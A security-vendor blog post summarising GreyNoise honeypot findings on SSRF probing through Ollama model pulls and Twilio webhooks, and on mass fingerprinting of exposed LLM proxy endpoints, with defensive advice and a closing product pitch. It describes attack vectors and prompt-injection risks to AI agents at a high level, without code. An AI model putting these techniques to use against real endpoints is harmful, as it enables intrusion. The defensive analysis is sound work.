GreyNoise Confirmed: Active Campaigns are Systematically Probing Enterprise LLMs

Alessandro Pignati • January 29, 2026

Contents

The era of theoretical AI risk has officially ended. Between October 2025 and January 2026, the GreyNoise honeypot infrastructure captured 91,403 attack sessions specifically targeting LLM endpoints. This is not the work of casual script kiddies or automated background noise. It represents a coordinated, industrial-scale effort to map the expanding attack surface of enterprise AI.

The data reveals two distinct campaigns that should serve as a wake-up call for any organization moving AI from experimental sandboxes into production:

The SSRF Campaign: Focused on exploiting model pull functionality to force outbound connections.
The Enumeration Campaign: A massive effort probing 73+ model endpoints to identify misconfigured proxies.

What makes these findings critical is the sheer volume and precision of the activity. Attackers are no longer just curious about what LLMs can do. They are actively inventorying exposed infrastructure to build target lists for future exploitation.

Breaking Down the SSRF Campaign and Model Pull Vulnerabilities

The first campaign identified by GreyNoise highlights a classic vulnerability: Server-Side Request Forgery (SSRF). Attackers targeted the way AI infrastructure handles model pulls, specifically focusing on two vectors:

Ollama Model Pulls: Injecting malicious registry URLs to trick servers into initiating outbound HTTP requests.
Twilio Webhooks: Manipulating MediaUrl parameters to trigger similar outbound connections.

A significant portion of this activity utilized ProjectDiscovery’s Out-of-band Application Security Testing (OAST) infrastructure. This allows attackers to confirm successful exploitation through callback validation. If the server "phones home" to the OAST domain, the vulnerability is confirmed.

GreyNoise observed a dramatic spike in this activity over the Christmas holiday, with over 1,600 sessions in just 48 hours. This timing is a classic hallmark of sophisticated operations, designed to exploit the reduced monitoring capacity of security teams during festive periods. For security leaders, this reinforces the need for rigorous egress filtering and runtime protection.

The LLM Enumeration Campaign: Mapping the AI Attack Surface

While the SSRF campaign was about exploitation, the second campaign discovered by GreyNoise was about something far more strategic: reconnaissance. Starting in late December 2025, two specific IP addresses launched a methodical probe that generated over 80,000 sessions in just eleven days. This was a systematic inventory hunting for misconfigured proxy servers, the "front doors" that organizations often put in place to manage access to commercial APIs.

The attackers tested every major model family, using innocuous queries to stay under the radar:

OpenAI: Testing GPT-4o and its variants.
Anthropic: Probing Claude Sonnet, Opus, and Haiku.
Google Gemini: Targeting Gemini-based API formats.
Open Source & Others: Systematic checks on Meta (Llama 3.x), DeepSeek, Mistral, Alibaba (Qwen), and xAI (Grok).

By sending simple questions like "How many states are there in the United States?" or the "strawberry" test, attackers can fingerprint the underlying model based on the response format and content. This allows them to determine exactly what you are running and whether the endpoint is vulnerable to further abuse.

The infrastructure behind this campaign has a long history of CVE exploitation, suggesting that this enumeration is just the first step in a larger exploitation pipeline. In this environment, proactive security is no longer optional. Organizations must treat their AI endpoints with the same level of scrutiny as their most sensitive legacy infrastructure.

Why Threat Actors Are Treating LLMs Like Legacy Infrastructure

The GreyNoise data signals a fundamental shift in the threat landscape. Attackers are now treating LLM infrastructure with the same systematic approach they used for VPNs, Elasticsearch clusters, and CI/CD servers. This transition from "experimental" to "production" creates a dangerous gap because:

Exposed Proxies: Organizations often expose model routes for convenience or testing, creating easy targets.
Blind Spots: Traditional security tools often fail to distinguish between legitimate developer queries and malicious fingerprinting.
High-Value Access: An exposed API proxy provides a gateway to the data and actions those models are authorized to perform.

To close this gap, organizations must adopt a security posture that is as sophisticated as the systems they are deploying.

From Reconnaissance to Exploitation in Agentic Systems

The GreyNoise findings represent "Phase 0" of a much more dangerous attack lifecycle targeting autonomous systems. Once a threat actor successfully fingerprints an LLM endpoint, the next step is often to exploit the agentic workflows built on top of it. If an attacker knows exactly which model you are running, they can craft highly targeted prompt injection attacks designed to subvert these actions.

The risks in agentic systems move from simple data exposure to functional compromise:

Subverted Actions: Agents could be tricked into executing unauthorized tools or modifying internal records.
Protocol Abuse: Connections via the MCP could be hijacked to exfiltrate sensitive data.
Persistence: Attackers can use identified endpoints to maintain long-term control over autonomous workflows.

Defending the Perimeter: Practical Best Practices from the Front Lines

The GreyNoise findings provide a clear roadmap for defense. The first and most immediate step is to lock down model pulls. If you are running local model infrastructure like Ollama, you must configure it to accept models only from trusted registries and implement strict egress filtering. This prevents the SSRF-driven "phone home" callbacks that threat actors use to confirm successful exploitation.

Key defensive strategies include:

Egress Filtering: Restrict outbound traffic to trusted IPs to block OAST callbacks.
Pattern Monitoring: Alert on fingerprinting queries and rapid-fire requests across multiple endpoints.
Vulnerability Discovery: AI Red Teaming to find flaws before attackers do.
Protocol Security: Deploy a specialized MCP scanner to ensure your data connections are secure.

Manual monitoring is rarely enough to keep pace with professional threat actors.

Securing the Future of AI Production

The GreyNoise report is a definitive signal that AI infrastructure has entered the mainstream threat cycle. As organizations move from experimental pilots to full-scale production, the "security by obscurity" that once protected internal LLM deployments is vanishing. The systematic mapping of nearly 100,000 sessions proves that professional threat actors are already building the maps they need to exploit the next generation of enterprise software.

Building a resilient AI strategy requires a shift from reactive patching to a foundation of trust and governance. This involves:

Treating LLM endpoints and API proxies as high-value production assets.
Ensuring the integrity of models and the safety of the actions they perform.
Implementing continuous monitoring and red teaming.

In this evolving landscape, NeuralTrust stands as a credible reference for organizations that prioritize security and governance. As a platform dedicated to AI trust, NeuralTrust provides the essential tools for runtime protection, AI Red Teaming, and governance that modern enterprises require. By partnering with experts focused on the unique challenges of AI security, you can build with confidence, knowing that your systems are protected against the sophisticated reconnaissance and exploitation tactics identified by GreyNoise.